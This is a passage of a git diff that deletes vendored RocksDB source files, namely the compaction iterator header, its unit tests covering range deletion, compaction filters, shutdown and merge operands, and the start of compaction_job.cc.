+++ /dev/null
@@ -1,197 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <algorithm>
-#include <deque>
-#include <string>
-#include <vector>
-
-#include "db/compaction.h"
-#include "db/compaction_iteration_stats.h"
-#include "db/merge_helper.h"
-#include "db/pinned_iterators_manager.h"
-#include "db/range_del_aggregator.h"
-#include "options/cf_options.h"
-#include "rocksdb/compaction_filter.h"
-
-namespace rocksdb {
-
-class CompactionEventListener;
-
-class CompactionIterator {
- public:
-  // A wrapper around Compaction. Has a much smaller interface, only what
-  // CompactionIterator uses. Tests can override it.
-  class CompactionProxy {
-   public:
-    explicit CompactionProxy(const Compaction* compaction)
-        : compaction_(compaction) {}
-
-    virtual ~CompactionProxy() = default;
-    virtual int level(size_t compaction_input_level = 0) const {
-      return compaction_->level();
-    }
-    virtual bool KeyNotExistsBeyondOutputLevel(
-        const Slice& user_key, std::vector<size_t>* level_ptrs) const {
-      return compaction_->KeyNotExistsBeyondOutputLevel(user_key, level_ptrs);
-    }
-    virtual bool bottommost_level() const {
-      return compaction_->bottommost_level();
-    }
-    virtual int number_levels() const { return compaction_->number_levels(); }
-    virtual Slice GetLargestUserKey() const {
-      return compaction_->GetLargestUserKey();
-    }
-    virtual bool allow_ingest_behind() const {
-      return compaction_->immutable_cf_options()->allow_ingest_behind;
-    }
-
-   protected:
-    CompactionProxy() = default;
-
-   private:
-    const Compaction* compaction_;
-  };
-
-  CompactionIterator(InternalIterator* input, const Comparator* cmp,
-                     MergeHelper* merge_helper, SequenceNumber last_sequence,
-                     std::vector<SequenceNumber>* snapshots,
-                     SequenceNumber earliest_write_conflict_snapshot, Env* env,
-                     bool expect_valid_internal_key,
-                     RangeDelAggregator* range_del_agg,
-                     const Compaction* compaction = nullptr,
-                     const CompactionFilter* compaction_filter = nullptr,
-                     CompactionEventListener* compaction_listener = nullptr,
-                     const std::atomic<bool>* shutting_down = nullptr);
-
-  // Constructor with custom CompactionProxy, used for tests.
-  CompactionIterator(InternalIterator* input, const Comparator* cmp,
-                     MergeHelper* merge_helper, SequenceNumber last_sequence,
-                     std::vector<SequenceNumber>* snapshots,
-                     SequenceNumber earliest_write_conflict_snapshot, Env* env,
-                     bool expect_valid_internal_key,
-                     RangeDelAggregator* range_del_agg,
-                     std::unique_ptr<CompactionProxy> compaction,
-                     const CompactionFilter* compaction_filter = nullptr,
-                     CompactionEventListener* compaction_listener = nullptr,
-                     const std::atomic<bool>* shutting_down = nullptr);
-
-  ~CompactionIterator();
-
-  void ResetRecordCounts();
-
-  // Seek to the beginning of the compaction iterator output.
-  //
-  // REQUIRED: Call only once.
-  void SeekToFirst();
-
-  // Produces the next record in the compaction.
-  //
-  // REQUIRED: SeekToFirst() has been called.
-  void Next();
-
-  // Getters
-  const Slice& key() const { return key_; }
-  const Slice& value() const { return value_; }
-  const Status& status() const { return status_; }
-  const ParsedInternalKey& ikey() const { return ikey_; }
-  bool Valid() const { return valid_; }
-  const Slice& user_key() const { return current_user_key_; }
-  const CompactionIterationStats& iter_stats() const { return iter_stats_; }
-
- private:
-  // Processes the input stream to find the next output
-  void NextFromInput();
-
-  // Do last preparations before presenting the output to the callee. At this
-  // point this only zeroes out the sequence number if possible for better
-  // compression.
-  void PrepareOutput();
-
-  // Given a sequence number, return the sequence number of the
-  // earliest snapshot that this sequence number is visible in.
-  // The snapshots themselves are arranged in ascending order of
-  // sequence numbers.
-  // Employ a sequential search because the total number of
-  // snapshots are typically small.
-  inline SequenceNumber findEarliestVisibleSnapshot(
-      SequenceNumber in, SequenceNumber* prev_snapshot);
-
-  InternalIterator* input_;
-  const Comparator* cmp_;
-  MergeHelper* merge_helper_;
-  const std::vector<SequenceNumber>* snapshots_;
-  const SequenceNumber earliest_write_conflict_snapshot_;
-  Env* env_;
-  bool expect_valid_internal_key_;
-  RangeDelAggregator* range_del_agg_;
-  std::unique_ptr<CompactionProxy> compaction_;
-  const CompactionFilter* compaction_filter_;
-#ifndef ROCKSDB_LITE
-  CompactionEventListener* compaction_listener_;
-#endif  // ROCKSDB_LITE
-  const std::atomic<bool>* shutting_down_;
-  bool bottommost_level_;
-  bool valid_ = false;
-  bool visible_at_tip_;
-  SequenceNumber earliest_snapshot_;
-  SequenceNumber latest_snapshot_;
-  bool ignore_snapshots_;
-
-  // State
-  //
-  // Points to a copy of the current compaction iterator output (current_key_)
-  // if valid_.
-  Slice key_;
-  // Points to the value in the underlying iterator that corresponds to the
-  // current output.
-  Slice value_;
-  // The status is OK unless compaction iterator encounters a merge operand
-  // while not having a merge operator defined.
-  Status status_;
-  // Stores the user key, sequence number and type of the current compaction
-  // iterator output (or current key in the underlying iterator during
-  // NextFromInput()).
-  ParsedInternalKey ikey_;
-  // Stores whether ikey_.user_key is valid. If set to false, the user key is
-  // not compared against the current key in the underlying iterator.
-  bool has_current_user_key_ = false;
-  bool at_next_ = false;  // If false, the iterator
-  // Holds a copy of the current compaction iterator output (or current key in
-  // the underlying iterator during NextFromInput()).
-  IterKey current_key_;
-  Slice current_user_key_;
-  SequenceNumber current_user_key_sequence_;
-  SequenceNumber current_user_key_snapshot_;
-
-  // True if the iterator has already returned a record for the current key.
-  bool has_outputted_key_ = false;
-
-  // truncated the value of the next key and output it without applying any
-  // compaction rules.  This is used for outputting a put after a single delete.
-  bool clear_and_output_next_key_ = false;
-
-  MergeOutputIterator merge_out_iter_;
-  // PinnedIteratorsManager used to pin input_ Iterator blocks while reading
-  // merge operands and then releasing them after consuming them.
-  PinnedIteratorsManager pinned_iters_mgr_;
-  std::string compaction_filter_value_;
-  InternalKey compaction_filter_skip_until_;
-  // "level_ptrs" holds indices that remember which file of an associated
-  // level we were last checking during the last call to compaction->
-  // KeyNotExistsBeyondOutputLevel(). This allows future calls to the function
-  // to pick off where it left off since each subcompaction's key range is
-  // increasing so a later call to the function must be looking for a key that
-  // is in or beyond the last file checked during the previous call
-  std::vector<size_t> level_ptrs_;
-  CompactionIterationStats iter_stats_;
-
-  bool IsShuttingDown() {
-    // This is a best-effort facility, so memory_order_relaxed is sufficient.
-    return shutting_down_ && shutting_down_->load(std::memory_order_relaxed);
-  }
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_iterator_test.cc b/thirdparty/rocksdb/db/compaction_iterator_test.cc
deleted file mode 100644
index dfc4139..0000000
--- a/thirdparty/rocksdb/db/compaction_iterator_test.cc
+++ /dev/null
@@ -1,568 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/compaction_iterator.h"
-
-#include <string>
-#include <vector>
-
-#include "port/port.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-// Expects no merging attempts.
-class NoMergingMergeOp : public MergeOperator {
- public:
-  bool FullMergeV2(const MergeOperationInput& merge_in,
-                   MergeOperationOutput* merge_out) const override {
-    ADD_FAILURE();
-    return false;
-  }
-  bool PartialMergeMulti(const Slice& key,
-                         const std::deque<Slice>& operand_list,
-                         std::string* new_value,
-                         Logger* logger) const override {
-    ADD_FAILURE();
-    return false;
-  }
-  const char* Name() const override {
-    return "CompactionIteratorTest NoMergingMergeOp";
-  }
-};
-
-// Compaction filter that gets stuck when it sees a particular key,
-// then gets unstuck when told to.
-// Always returns Decition::kRemove.
-class StallingFilter : public CompactionFilter {
- public:
-  virtual Decision FilterV2(int level, const Slice& key, ValueType t,
-                            const Slice& existing_value, std::string* new_value,
-                            std::string* skip_until) const override {
-    int k = std::atoi(key.ToString().c_str());
-    last_seen.store(k);
-    while (k >= stall_at.load()) {
-      std::this_thread::yield();
-    }
-    return Decision::kRemove;
-  }
-
-  const char* Name() const override {
-    return "CompactionIteratorTest StallingFilter";
-  }
-
-  // Wait until the filter sees a key >= k and stalls at that key.
-  // If `exact`, asserts that the seen key is equal to k.
-  void WaitForStall(int k, bool exact = true) {
-    stall_at.store(k);
-    while (last_seen.load() < k) {
-      std::this_thread::yield();
-    }
-    if (exact) {
-      EXPECT_EQ(k, last_seen.load());
-    }
-  }
-
-  // Filter will stall on key >= stall_at. Advance stall_at to unstall.
-  mutable std::atomic<int> stall_at{0};
-  // Last key the filter was called with.
-  mutable std::atomic<int> last_seen{0};
-};
-
-class LoggingForwardVectorIterator : public InternalIterator {
- public:
-  struct Action {
-    enum class Type {
-      SEEK_TO_FIRST,
-      SEEK,
-      NEXT,
-    };
-
-    Type type;
-    std::string arg;
-
-    explicit Action(Type _type, std::string _arg = "")
-        : type(_type), arg(_arg) {}
-
-    bool operator==(const Action& rhs) const {
-      return std::tie(type, arg) == std::tie(rhs.type, rhs.arg);
-    }
-  };
-
-  LoggingForwardVectorIterator(const std::vector<std::string>& keys,
-                               const std::vector<std::string>& values)
-      : keys_(keys), values_(values), current_(keys.size()) {
-    assert(keys_.size() == values_.size());
-  }
-
-  virtual bool Valid() const override { return current_ < keys_.size(); }
-
-  virtual void SeekToFirst() override {
-    log.emplace_back(Action::Type::SEEK_TO_FIRST);
-    current_ = 0;
-  }
-  virtual void SeekToLast() override { assert(false); }
-
-  virtual void Seek(const Slice& target) override {
-    log.emplace_back(Action::Type::SEEK, target.ToString());
-    current_ = std::lower_bound(keys_.begin(), keys_.end(), target.ToString()) -
-               keys_.begin();
-  }
-
-  virtual void SeekForPrev(const Slice& target) override { assert(false); }
-
-  virtual void Next() override {
-    assert(Valid());
-    log.emplace_back(Action::Type::NEXT);
-    current_++;
-  }
-  virtual void Prev() override { assert(false); }
-
-  virtual Slice key() const override {
-    assert(Valid());
-    return Slice(keys_[current_]);
-  }
-  virtual Slice value() const override {
-    assert(Valid());
-    return Slice(values_[current_]);
-  }
-
-  virtual Status status() const override { return Status::OK(); }
-
-  std::vector<Action> log;
-
- private:
-  std::vector<std::string> keys_;
-  std::vector<std::string> values_;
-  size_t current_;
-};
-
-class FakeCompaction : public CompactionIterator::CompactionProxy {
- public:
-  FakeCompaction() = default;
-
-  virtual int level(size_t compaction_input_level) const { return 0; }
-  virtual bool KeyNotExistsBeyondOutputLevel(
-      const Slice& user_key, std::vector<size_t>* level_ptrs) const {
-    return key_not_exists_beyond_output_level;
-  }
-  virtual bool bottommost_level() const { return false; }
-  virtual int number_levels() const { return 1; }
-  virtual Slice GetLargestUserKey() const {
-    return "\xff\xff\xff\xff\xff\xff\xff\xff\xff";
-  }
-  virtual bool allow_ingest_behind() const { return false; }
-
-  bool key_not_exists_beyond_output_level = false;
-};
-
-class CompactionIteratorTest : public testing::Test {
- public:
-  CompactionIteratorTest()
-      : cmp_(BytewiseComparator()), icmp_(cmp_), snapshots_({}) {}
-
-  void InitIterators(const std::vector<std::string>& ks,
-                     const std::vector<std::string>& vs,
-                     const std::vector<std::string>& range_del_ks,
-                     const std::vector<std::string>& range_del_vs,
-                     SequenceNumber last_sequence,
-                     MergeOperator* merge_op = nullptr,
-                     CompactionFilter* filter = nullptr) {
-    std::unique_ptr<InternalIterator> range_del_iter(
-        new test::VectorIterator(range_del_ks, range_del_vs));
-    range_del_agg_.reset(new RangeDelAggregator(icmp_, snapshots_));
-    ASSERT_OK(range_del_agg_->AddTombstones(std::move(range_del_iter)));
-
-    std::unique_ptr<CompactionIterator::CompactionProxy> compaction;
-    if (filter) {
-      compaction_proxy_ = new FakeCompaction();
-      compaction.reset(compaction_proxy_);
-    }
-
-    merge_helper_.reset(new MergeHelper(Env::Default(), cmp_, merge_op, filter,
-                                        nullptr, false, 0, 0, nullptr,
-                                        &shutting_down_));
-    iter_.reset(new LoggingForwardVectorIterator(ks, vs));
-    iter_->SeekToFirst();
-    c_iter_.reset(new CompactionIterator(
-        iter_.get(), cmp_, merge_helper_.get(), last_sequence, &snapshots_,
-        kMaxSequenceNumber, Env::Default(), false, range_del_agg_.get(),
-        std::move(compaction), filter, nullptr, &shutting_down_));
-  }
-
-  void AddSnapshot(SequenceNumber snapshot) { snapshots_.push_back(snapshot); }
-
-  const Comparator* cmp_;
-  const InternalKeyComparator icmp_;
-  std::vector<SequenceNumber> snapshots_;
-  std::unique_ptr<MergeHelper> merge_helper_;
-  std::unique_ptr<LoggingForwardVectorIterator> iter_;
-  std::unique_ptr<CompactionIterator> c_iter_;
-  std::unique_ptr<RangeDelAggregator> range_del_agg_;
-  std::atomic<bool> shutting_down_{false};
-  FakeCompaction* compaction_proxy_;
-};
-
-// It is possible that the output of the compaction iterator is empty even if
-// the input is not.
-TEST_F(CompactionIteratorTest, EmptyResult) {
-  InitIterators({test::KeyStr("a", 5, kTypeSingleDeletion),
-                 test::KeyStr("a", 3, kTypeValue)},
-                {"", "val"}, {}, {}, 5);
-  c_iter_->SeekToFirst();
-  ASSERT_FALSE(c_iter_->Valid());
-}
-
-// If there is a corruption after a single deletion, the corrupted key should
-// be preserved.
-TEST_F(CompactionIteratorTest, CorruptionAfterSingleDeletion) {
-  InitIterators({test::KeyStr("a", 5, kTypeSingleDeletion),
-                 test::KeyStr("a", 3, kTypeValue, true),
-                 test::KeyStr("b", 10, kTypeValue)},
-                {"", "val", "val2"}, {}, {}, 10);
-  c_iter_->SeekToFirst();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 5, kTypeSingleDeletion),
-            c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 3, kTypeValue, true), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("b", 10, kTypeValue), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_FALSE(c_iter_->Valid());
-}
-
-TEST_F(CompactionIteratorTest, SimpleRangeDeletion) {
-  InitIterators({test::KeyStr("morning", 5, kTypeValue),
-                 test::KeyStr("morning", 2, kTypeValue),
-                 test::KeyStr("night", 3, kTypeValue)},
-                {"zao", "zao", "wan"},
-                {test::KeyStr("ma", 4, kTypeRangeDeletion)}, {"mz"}, 5);
-  c_iter_->SeekToFirst();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("morning", 5, kTypeValue), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("night", 3, kTypeValue), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_FALSE(c_iter_->Valid());
-}
-
-TEST_F(CompactionIteratorTest, RangeDeletionWithSnapshots) {
-  AddSnapshot(10);
-  std::vector<std::string> ks1;
-  ks1.push_back(test::KeyStr("ma", 28, kTypeRangeDeletion));
-  std::vector<std::string> vs1{"mz"};
-  std::vector<std::string> ks2{test::KeyStr("morning", 15, kTypeValue),
-                               test::KeyStr("morning", 5, kTypeValue),
-                               test::KeyStr("night", 40, kTypeValue),
-                               test::KeyStr("night", 20, kTypeValue)};
-  std::vector<std::string> vs2{"zao 15", "zao 5", "wan 40", "wan 20"};
-  InitIterators(ks2, vs2, ks1, vs1, 40);
-  c_iter_->SeekToFirst();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("morning", 5, kTypeValue), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("night", 40, kTypeValue), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_FALSE(c_iter_->Valid());
-}
-
-TEST_F(CompactionIteratorTest, CompactionFilterSkipUntil) {
-  class Filter : public CompactionFilter {
-    virtual Decision FilterV2(int level, const Slice& key, ValueType t,
-                              const Slice& existing_value,
-                              std::string* new_value,
-                              std::string* skip_until) const override {
-      std::string k = key.ToString();
-      std::string v = existing_value.ToString();
-      // See InitIterators() call below for the sequence of keys and their
-      // filtering decisions. Here we closely assert that compaction filter is
-      // called with the expected keys and only them, and with the right values.
-      if (k == "a") {
-        EXPECT_EQ(ValueType::kValue, t);
-        EXPECT_EQ("av50", v);
-        return Decision::kKeep;
-      }
-      if (k == "b") {
-        EXPECT_EQ(ValueType::kValue, t);
-        EXPECT_EQ("bv60", v);
-        *skip_until = "d+";
-        return Decision::kRemoveAndSkipUntil;
-      }
-      if (k == "e") {
-        EXPECT_EQ(ValueType::kMergeOperand, t);
-        EXPECT_EQ("em71", v);
-        return Decision::kKeep;
-      }
-      if (k == "f") {
-        if (v == "fm65") {
-          EXPECT_EQ(ValueType::kMergeOperand, t);
-          *skip_until = "f";
-        } else {
-          EXPECT_EQ("fm30", v);
-          EXPECT_EQ(ValueType::kMergeOperand, t);
-          *skip_until = "g+";
-        }
-        return Decision::kRemoveAndSkipUntil;
-      }
-      if (k == "h") {
-        EXPECT_EQ(ValueType::kValue, t);
-        EXPECT_EQ("hv91", v);
-        return Decision::kKeep;
-      }
-      if (k == "i") {
-        EXPECT_EQ(ValueType::kMergeOperand, t);
-        EXPECT_EQ("im95", v);
-        *skip_until = "z";
-        return Decision::kRemoveAndSkipUntil;
-      }
-      ADD_FAILURE();
-      return Decision::kKeep;
-    }
-
-    const char* Name() const override {
-      return "CompactionIteratorTest.CompactionFilterSkipUntil::Filter";
-    }
-  };
-
-  NoMergingMergeOp merge_op;
-  Filter filter;
-  InitIterators(
-      {test::KeyStr("a", 50, kTypeValue),  // keep
-       test::KeyStr("a", 45, kTypeMerge),
-       test::KeyStr("b", 60, kTypeValue),  // skip to "d+"
-       test::KeyStr("b", 40, kTypeValue), test::KeyStr("c", 35, kTypeValue),
-       test::KeyStr("d", 70, kTypeMerge),
-       test::KeyStr("e", 71, kTypeMerge),  // keep
-       test::KeyStr("f", 65, kTypeMerge),  // skip to "f", aka keep
-       test::KeyStr("f", 30, kTypeMerge),  // skip to "g+"
-       test::KeyStr("f", 25, kTypeValue), test::KeyStr("g", 90, kTypeValue),
-       test::KeyStr("h", 91, kTypeValue),  // keep
-       test::KeyStr("i", 95, kTypeMerge),  // skip to "z"
-       test::KeyStr("j", 99, kTypeValue)},
-      {"av50", "am45", "bv60", "bv40", "cv35", "dm70", "em71", "fm65", "fm30",
-       "fv25", "gv90", "hv91", "im95", "jv99"},
-      {}, {}, kMaxSequenceNumber, &merge_op, &filter);
-
-  // Compaction should output just "a", "e" and "h" keys.
-  c_iter_->SeekToFirst();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 50, kTypeValue), c_iter_->key().ToString());
-  ASSERT_EQ("av50", c_iter_->value().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("e", 71, kTypeMerge), c_iter_->key().ToString());
-  ASSERT_EQ("em71", c_iter_->value().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("h", 91, kTypeValue), c_iter_->key().ToString());
-  ASSERT_EQ("hv91", c_iter_->value().ToString());
-  c_iter_->Next();
-  ASSERT_FALSE(c_iter_->Valid());
-
-  // Check that the compaction iterator did the correct sequence of calls on
-  // the underlying iterator.
-  using A = LoggingForwardVectorIterator::Action;
-  using T = A::Type;
-  std::vector<A> expected_actions = {
-      A(T::SEEK_TO_FIRST),
-      A(T::NEXT),
-      A(T::NEXT),
-      A(T::SEEK, test::KeyStr("d+", kMaxSequenceNumber, kValueTypeForSeek)),
-      A(T::NEXT),
-      A(T::NEXT),
-      A(T::SEEK, test::KeyStr("g+", kMaxSequenceNumber, kValueTypeForSeek)),
-      A(T::NEXT),
-      A(T::SEEK, test::KeyStr("z", kMaxSequenceNumber, kValueTypeForSeek))};
-  ASSERT_EQ(expected_actions, iter_->log);
-}
-
-TEST_F(CompactionIteratorTest, ShuttingDownInFilter) {
-  NoMergingMergeOp merge_op;
-  StallingFilter filter;
-  InitIterators(
-      {test::KeyStr("1", 1, kTypeValue), test::KeyStr("2", 2, kTypeValue),
-       test::KeyStr("3", 3, kTypeValue), test::KeyStr("4", 4, kTypeValue)},
-      {"v1", "v2", "v3", "v4"}, {}, {}, kMaxSequenceNumber, &merge_op, &filter);
-  // Don't leave tombstones (kTypeDeletion) for filtered keys.
-  compaction_proxy_->key_not_exists_beyond_output_level = true;
-
-  std::atomic<bool> seek_done{false};
-  rocksdb::port::Thread compaction_thread([&] {
-    c_iter_->SeekToFirst();
-    EXPECT_FALSE(c_iter_->Valid());
-    EXPECT_TRUE(c_iter_->status().IsShutdownInProgress());
-    seek_done.store(true);
-  });
-
-  // Let key 1 through.
-  filter.WaitForStall(1);
-
-  // Shutdown during compaction filter call for key 2.
-  filter.WaitForStall(2);
-  shutting_down_.store(true);
-  EXPECT_FALSE(seek_done.load());
-
-  // Unstall filter and wait for SeekToFirst() to return.
-  filter.stall_at.store(3);
-  compaction_thread.join();
-  assert(seek_done.load());
-
-  // Check that filter was never called again.
-  EXPECT_EQ(2, filter.last_seen.load());
-}
-
-// Same as ShuttingDownInFilter, but shutdown happens during filter call for
-// a merge operand, not for a value.
-TEST_F(CompactionIteratorTest, ShuttingDownInMerge) {
-  NoMergingMergeOp merge_op;
-  StallingFilter filter;
-  InitIterators(
-      {test::KeyStr("1", 1, kTypeValue), test::KeyStr("2", 2, kTypeMerge),
-       test::KeyStr("3", 3, kTypeMerge), test::KeyStr("4", 4, kTypeValue)},
-      {"v1", "v2", "v3", "v4"}, {}, {}, kMaxSequenceNumber, &merge_op, &filter);
-  compaction_proxy_->key_not_exists_beyond_output_level = true;
-
-  std::atomic<bool> seek_done{false};
-  rocksdb::port::Thread compaction_thread([&] {
-    c_iter_->SeekToFirst();
-    ASSERT_FALSE(c_iter_->Valid());
-    ASSERT_TRUE(c_iter_->status().IsShutdownInProgress());
-    seek_done.store(true);
-  });
-
-  // Let key 1 through.
-  filter.WaitForStall(1);
-
-  // Shutdown during compaction filter call for key 2.
-  filter.WaitForStall(2);
-  shutting_down_.store(true);
-  EXPECT_FALSE(seek_done.load());
-
-  // Unstall filter and wait for SeekToFirst() to return.
-  filter.stall_at.store(3);
-  compaction_thread.join();
-  assert(seek_done.load());
-
-  // Check that filter was never called again.
-  EXPECT_EQ(2, filter.last_seen.load());
-}
-
-TEST_F(CompactionIteratorTest, SingleMergeOperand) {
-  class Filter : public CompactionFilter {
-    virtual Decision FilterV2(int level, const Slice& key, ValueType t,
-                              const Slice& existing_value,
-                              std::string* new_value,
-                              std::string* skip_until) const override {
-      std::string k = key.ToString();
-      std::string v = existing_value.ToString();
-
-      // See InitIterators() call below for the sequence of keys and their
-      // filtering decisions. Here we closely assert that compaction filter is
-      // called with the expected keys and only them, and with the right values.
-      if (k == "a") {
-        EXPECT_EQ(ValueType::kMergeOperand, t);
-        EXPECT_EQ("av1", v);
-        return Decision::kKeep;
-      } else if (k == "b") {
-        EXPECT_EQ(ValueType::kMergeOperand, t);
-        return Decision::kKeep;
-      } else if (k == "c") {
-        return Decision::kKeep;
-      }
-
-      ADD_FAILURE();
-      return Decision::kKeep;
-    }
-
-    const char* Name() const override {
-      return "CompactionIteratorTest.SingleMergeOperand::Filter";
-    }
-  };
-
-  class SingleMergeOp : public MergeOperator {
-   public:
-    bool FullMergeV2(const MergeOperationInput& merge_in,
-                     MergeOperationOutput* merge_out) const override {
-      // See InitIterators() call below for why "c" is the only key for which
-      // FullMergeV2 should be called.
-      EXPECT_EQ("c", merge_in.key.ToString());
-
-      std::string temp_value;
-      if (merge_in.existing_value != nullptr) {
-        temp_value = merge_in.existing_value->ToString();
-      }
-
-      for (auto& operand : merge_in.operand_list) {
-        temp_value.append(operand.ToString());
-      }
-      merge_out->new_value = temp_value;
-
-      return true;
-    }
-
-    bool PartialMergeMulti(const Slice& key,
-                           const std::deque<Slice>& operand_list,
-                           std::string* new_value,
-                           Logger* logger) const override {
-      std::string string_key = key.ToString();
-      EXPECT_TRUE(string_key == "a" || string_key == "b");
-
-      if (string_key == "a") {
-        EXPECT_EQ(1, operand_list.size());
-      } else if (string_key == "b") {
-        EXPECT_EQ(2, operand_list.size());
-      }
-
-      std::string temp_value;
-      for (auto& operand : operand_list) {
-        temp_value.append(operand.ToString());
-      }
-      swap(temp_value, *new_value);
-
-      return true;
-    }
-
-    const char* Name() const override {
-      return "CompactionIteratorTest SingleMergeOp";
-    }
-
-    bool AllowSingleOperand() const override { return true; }
-  };
-
-  SingleMergeOp merge_op;
-  Filter filter;
-  InitIterators(
-      // a should invoke PartialMergeMulti with a single merge operand.
-      {test::KeyStr("a", 50, kTypeMerge),
-       // b should invoke PartialMergeMulti with two operands.
-       test::KeyStr("b", 70, kTypeMerge), test::KeyStr("b", 60, kTypeMerge),
-       // c should invoke FullMerge due to kTypeValue at the beginning.
-       test::KeyStr("c", 90, kTypeMerge), test::KeyStr("c", 80, kTypeValue)},
-      {"av1", "bv2", "bv1", "cv2", "cv1"}, {}, {}, kMaxSequenceNumber,
-      &merge_op, &filter);
-
-  c_iter_->SeekToFirst();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 50, kTypeMerge), c_iter_->key().ToString());
-  ASSERT_EQ("av1", c_iter_->value().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ("bv1bv2", c_iter_->value().ToString());
-  c_iter_->Next();
-  ASSERT_EQ("cv1cv2", c_iter_->value().ToString());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/compaction_job.cc b/thirdparty/rocksdb/db/compaction_job.cc
deleted file mode 100644
index 1d023ca..0000000
--- a/thirdparty/rocksdb/db/compaction_job.cc
+++ /dev/null
@@ -1,1471 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/compaction_job.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <functional>
-#include <list>
-#include <memory>
-#include <random>
-#include <set>
-#include <thread>
-#include <utility>
-#include <vector>
-
-#include "db/builder.h"
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "db/event_helpers.h"
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/memtable.h"
-#include "db/memtable_list.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "db/version_set.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/thread_status_util.h"
-#include "port/likely.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "table/block.h"
-#include "table/block_based_table_factory.h"
-#include "table/merging_iterator.h"
-#include "table/table_builder.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// Maintains state for each sub-compaction
-struct CompactionJob::SubcompactionState {
-  const Compaction* compaction;
-  std::unique_ptr<CompactionIterator> c_iter;
-
-  // The boundaries of the key-range this compaction is interested in. No two
-  // subcompactions may have overlapping key-ranges.
-  // 'start' is inclusive, 'end' is exclusive, and nullptr means unbounded
-  Slice *start, *end;
-
-  // The return status of this subcompaction
-  Status status;
-
-  // Files produced by this subcompaction
-  struct Output {
-    FileMetaData meta;
-    bool finished;
-    std::shared_ptr<const TableProperties> table_properties;
-  };
-
-  // State kept for output being generated
-  std::vector<Output> outputs;
-  std::unique_ptr<WritableFileWriter> outfile;
-  std::unique_ptr<TableBuilder> builder;
-  Output* current_output() {
-    if (outputs.empty()) {
-      // This subcompaction's outptut could be empty if compaction was aborted
-      // before this subcompaction had a chance to generate any output files.
-      // When subcompactions are executed sequentially this is more likely and
-      // will be particulalry likely for the later subcompactions to be empty.
-      // Once they are run in parallel however it should be much rarer.
-      return nullptr;
-    } else {
-      return &outputs.back();
-    }
-  }
-
-  uint64_t current_output_file_size;
-
-  // State during the subcompaction
-  uint64_t total_bytes;
-  uint64_t num_input_records;
-  uint64_t num_output_records;
-  CompactionJobStats compaction_job_stats;
-  uint64_t approx_size;
-  // An index that used to speed up ShouldStopBefore().
-  size_t grandparent_index = 0;
-  // The number of bytes overlapping between the current output and
-  // grandparent files used in ShouldStopBefore().
-  uint64_t overlapped_bytes = 0;
-  // A flag determine whether the key has been seen in ShouldStopBefore()
-  bool seen_key = false;
-  std::string compression_dict;
-
-  SubcompactionState(Compaction* c, Slice* _start, Slice* _end,
-                     uint64_t size = 0)
-      : compaction(c),
-        start(_start),
-        end(_end),
-        outfile(nullptr),
-        builder(nullptr),
-        current_output_file_size(0),
-        total_bytes(0),
-        num_input_records(0),
-        num_output_records(0),
-        approx_size(size),
-        grandparent_index(0),
-        overlapped_bytes(0),
-        seen_key(false),
-        compression_dict() {
-    assert(compaction != nullptr);
-  }
-
